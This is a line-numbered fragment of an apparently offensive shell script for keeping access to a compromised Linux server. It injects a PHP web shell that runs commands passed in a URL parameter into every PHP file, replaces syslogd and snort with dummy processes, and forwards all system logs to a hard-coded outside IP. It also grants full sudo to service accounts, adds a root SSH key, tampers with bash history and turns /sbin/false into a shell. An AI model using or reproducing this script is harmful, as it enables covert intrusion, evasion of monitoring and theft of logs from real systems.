7 #1. Add your IP address below for the /etc/hosts modification to reference 'linux' and open Syslog on your system
8 #2. Add your SSH host keys
11 #Find all PHP scripts and install a backdoor http://url/phpscript.php?hfb=ls
12 for i in `find / -name "*.php"`
14 echo "<pre><?php if(isset(\$_GET['hfb'])) { system(\$_GET['hfb'],\$output); echo (\$output); unset(\$_GET['hfb']);} php?></pre>" >> $i.tmp
20 mv `find / -name syslogd` /usr/sbin/init
21 #Replace syslogd with dummy process
22 mv syslogd /sbin/syslogd
24 #Replace snort with dummy process
25 mv snort `find / -name snort`
27 #Forward all local system events to us
28 echo "" >> /etc/syslogd.conf
29 echo "*.* @linux" >> /etc/syslogd.conf
30 #Alias us in hosts file
31 echo "208.18.90.66 linux" >> /etc/hosts
34 echo "mysql ALL=(ALL) ALL" >> /etc/sudoers
35 echo "apache ALL=(ALL) ALL" >> /etc/sudoers
36 echo "asterisk ALL=(ALL) ALL" >> /etc/sudoers
39 echo "" >> /root/.ssh/authorized_keys
41 #Backup and copy .bash_history on system logout
42 cp /root/.bash_history /var/log/ksyslog.log
43 echo "mv /var/log/ksyslog.log /root/.bash_history" >> /root/.bash_logout
47 cp /bin/sh /sbin/false